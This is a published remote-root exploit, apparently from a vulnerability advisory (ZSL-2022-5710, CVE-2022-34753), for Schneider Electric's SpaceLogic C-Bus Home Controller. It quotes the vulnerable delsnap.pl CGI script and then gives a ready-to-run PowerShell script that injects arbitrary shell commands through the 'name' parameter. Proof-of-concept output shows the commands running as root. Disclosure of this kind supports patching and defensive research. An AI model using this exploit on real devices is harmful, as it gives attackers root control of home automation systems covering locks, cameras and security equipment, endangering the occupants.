Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root

<#SpaceLogic.ps1Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root ExploitVendor: Schneider Electric SEProduct web page: https://www.se.com                  https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/                  https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmwareAffected version: SpaceLogic C-Bus Home Controller (5200WHC2)                  formerly known as C-Bus Wiser Home Controller MK2                  V1.31.460 and prior                  Firmware: 604Summary: SpaceLogic C-Bus Home Automation SystemLighting control and automation solutions forbuildings of the future, part of SpaceLogic.SpaceLogic C-Bus is a powerful, fully integratedsystem that can control and automate lightingand many other electrical systems and products.The SpaceLogic C-Bus system is robust, flexible,scalable and has proven solutions for buildingsof the future. Implemented for commercial andresidential buildings automation, it bringscontrol, comfort, efficiency and ease of useto its occupants.Wiser Home Control makes technologies in yourhome easy by providing seamless control of music,home theatre, lighting, air conditioning, sprinklersystems, curtains and shutters, security systems...you name it. Usable anytime, anywhere even whenyou are away, via preset shortcuts or directcontrol, in the same look and feel from a wallswitch, a home computer, or even your smartphoneor TV - there is no wiser way to enjoy 24/7connectivity, comfort and convenience, entertainmentand peace of mind homewide! The Wiser 2 Home Controller allows you to accessyour C-Bus using a graphical user interface, sometimesreferred to as the Wiser 2 UI. The Wiser 2 HomeController arrives with a sample project loadedand the user interface accessible from your localhome network. With certain options set, you canalso access the Wiser 2 UI from anywhere usingthe Internet. Using the Wiser 2 Home Controlleryou can: control equipment such as IP cameras,C-Bus devices and non C-Bus wired and wirelessequipment on the home LAN, schedule events inthe home, create and store scenes on-board, customisea C-Bus system using the on-board Logic Engine,monitor the home environment including C-Bus andsecurity systems, control ZigBee products suchas Ulti-ZigBee Dimmer, Relay, Groups and Curtains.Examples of equipment you might access with Wiser2 Home Controller include lighting, HVAC, curtains,cameras, sprinkler systems, power monitoring, Ulti-ZigBee,multi-room audio and security controls.Desc: The home automation solution suffers froman authenticated OS command injection vulnerability.This can be exploited to inject and execute arbitraryshell commands as the root user via the 'name' GETparameter in 'delsnap.pl' Perl/CGI script which isused for deleting snapshots taken from the webcam.=========================================================/www/delsnap.pl:----------------01: #!/usr/bin/perl02: use IO::Handle;03:04:05: select(STDERR);06: $| = 1;07: select(STDOUT);08: $| = 1;09:10: #print "\r\n\r\n";11:12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';13: use CGI;14:15: my $PROGNAME = "delsnap.pl";16:17: my $cgi = new CGI();18:19: my $name = $cgi->param('name');20: if ($name eq "list") {21:     print "\r\n\r\n";22:     print "DATA=";23:     print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;24:     exit(0);25: }26: if ($name eq "deleteall") {27:     print "\r\n\r\n";28:     print "DELETINGALL=TRUE&";29:     print `rm /mnt/microsd/clipsal/ugen/imgs/*`;30:     print "COMPLETED=true\n";31:     exit(0);32: }33: #print "name $name\n";34: print "\r\n\r\n";35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";36:37: unlink $filename or die "COMPLETED=false\n";38:39: print "COMPLETED=true\n";=========================================================Tested on: Machine: OMAP3 Wiser2 Board           CPU: ARMv7 revision 2           GNU/Linux 2.6.37 (armv7l)           BusyBox v1.22.1           thttpd/2.25b           Perl v5.20.0           Clipsal 81           Angstrom 2009.X-stable           PICED 4.14.0.100           lighttpd/1.7           GCC 4.4.3           NodeJS v10.15.3Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5710Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.phpVendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdfCVE ID: CVE-2022-34753CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3475327.03.2022#>$host.UI.RawUI.ForegroundColor = "Green"if ($($args.Count) -ne 2)  {    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")} else {    $ip = $args[0]    $cmd = $args[1]    $cmdinj = "/delsnap.pl?name=|$cmd"    Write-Host("`nSending command '$cmd' to $ip`n")    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj    curl -v $ip$cmdinj}<#PoCPS C:\> .\SpaceLogic.ps1Usage: .\SpaceLogic.ps1 [IP] [CMD]PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"Sending command 'uname -a;id;pwd' to 192.168.1.2VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payloadVERBOSE: received 129-byte response of content type text/html; charset=utf-8StatusCode        : 200StatusDescription : OKContent           : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux                    uid=0(root) gid=0(root)                    /custom-package                    RawContent        : HTTP/1.1 200 OK                    Access-Control-Allow-Origin: *                    Connection: keep-alive                    Content-Length: 129                    Content-Type: text/html; charset=utf-8                    Date: Thu, 30 Jun 2022 14:48:43 GMT                    ETag: W/"81-LTIWJvYlDBYAlgXEy...Forms             : {}Headers           : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;                     charset=utf-8]...}Images            : {}InputFields       : {}Links             : {}ParsedHtml        : mshtml.HTMLDocumentClassRawContentLength  : 129PS C:\>#>